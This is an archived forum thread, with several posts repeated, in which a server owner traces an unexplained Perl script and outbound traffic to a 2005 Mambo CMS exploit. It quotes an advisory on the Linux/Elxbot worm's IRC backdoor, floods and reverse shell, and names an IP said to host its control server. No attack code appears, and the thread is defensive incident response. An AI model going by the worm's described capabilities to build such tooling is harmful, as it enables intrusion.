It appears a Perl script was uploaded to my server and is causing excessive outbound traffic. I'm not running any Perl scripts that I know of, however it was probably uploaded via a PHP script.
Does this sound like a hack? Any ideas of where I can look for the vulnerability?
Thanks in advance!
Full Version: Was I hacked?
There is a possibility. You could disable the Perl script and do a CHKROOTKIT http://www.chkrootkit.org/ and then at the same time go to Orbit and request for a free vulnerability scanning of your system https://orbit.theplanet.com/nav_services/vs...an_request.html
Even if you are not attack, it is always a good idea to run those at least once a month as part of your maintenance regime.
Even if you are not attack, it is always a good idea to run those at least once a month as part of your maintenance regime.
I would also recommend IMMEDIATELY reviewing your apache logs to find out for sure if a php script was exploited. I've seen this happen quite a few times(and even on one of my boxes when I failed to keep something up to date).
Better safe than sorry.
Better safe than sorry.
Good call, guys! I'll do a CHKROOTKIT and request a vulnerability scan. I've dl'ed my logs so now I'll have to make some sense of it.
Thanks!
Thanks!
Turns out it was a Mambo exploit. Here is a post from Outpost24.com...
There is a security patch available from Mambo:
http://www.mamboserver.com/index.php?optio...id=172&Itemid=1
Hope this helps someone else.
QUOTE
Mambo worm in the wild
2005-12-05 8:08 PM, GMT
Mambo is a dynamic portal engine and content management system. The software is written in PHP. A computer researcher which goes under the alias rgod released an exploit for the "register_globals" Emulation Layer Overwrite vulnerability and just a few days after
the vulnerability was released increased attacks for this vulnerability was monitored, the increased traffic is due to a worm which is currently in the wild.
Linux/Elxbot is a backdoor for the Mambo vulnerability. It will search on Google for vulnerable targets. Once it infects a computer it will connect to a predetermined IRC server where the attackers will wait and have the possibility to gain access to the infected computer. The attackers may also perform various tasks such as:
* Execute arbitrary commands
* TCP flood
* HTTP flood
* UDP flood
* Search Google for more vulnerable targets
* Portscan
On certain systems it will also download a perl script which will allow the attacker to create a backchannel and spawn a shell on the infected computer with the same privileges as the running webserver.
2005-12-05 8:08 PM, GMT
Mambo is a dynamic portal engine and content management system. The software is written in PHP. A computer researcher which goes under the alias rgod released an exploit for the "register_globals" Emulation Layer Overwrite vulnerability and just a few days after
the vulnerability was released increased attacks for this vulnerability was monitored, the increased traffic is due to a worm which is currently in the wild.
Linux/Elxbot is a backdoor for the Mambo vulnerability. It will search on Google for vulnerable targets. Once it infects a computer it will connect to a predetermined IRC server where the attackers will wait and have the possibility to gain access to the infected computer. The attackers may also perform various tasks such as:
* Execute arbitrary commands
* TCP flood
* HTTP flood
* UDP flood
* Search Google for more vulnerable targets
* Portscan
On certain systems it will also download a perl script which will allow the attacker to create a backchannel and spawn a shell on the infected computer with the same privileges as the running webserver.
There is a security patch available from Mambo:
http://www.mamboserver.com/index.php?optio...id=172&Itemid=1
Hope this helps someone else.
[quote="bamaster"]Turns out it was a Mambo exploit. Here is a post from Outpost24.com...
[quote]
Hope this helps someone else.[/quote]
Yeah, if it hadn't been for this very post I'dve been continually screwed.
The punks are currently using an exploited server at IP 208.53.182.54 to run an IRC server, which is where the worm sends all its data to at the moment. I'm sure they'll find a new home in the coming days as I've definitely notified the admins at fdcservers about their activities.
thanks for that post, man...
[quote]
Hope this helps someone else.[/quote]
Yeah, if it hadn't been for this very post I'dve been continually screwed.
The punks are currently using an exploited server at IP 208.53.182.54 to run an IRC server, which is where the worm sends all its data to at the moment. I'm sure they'll find a new home in the coming days as I've definitely notified the admins at fdcservers about their activities.
thanks for that post, man...
QUOTE
Hope this helps someone else.
It did. Thank you
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.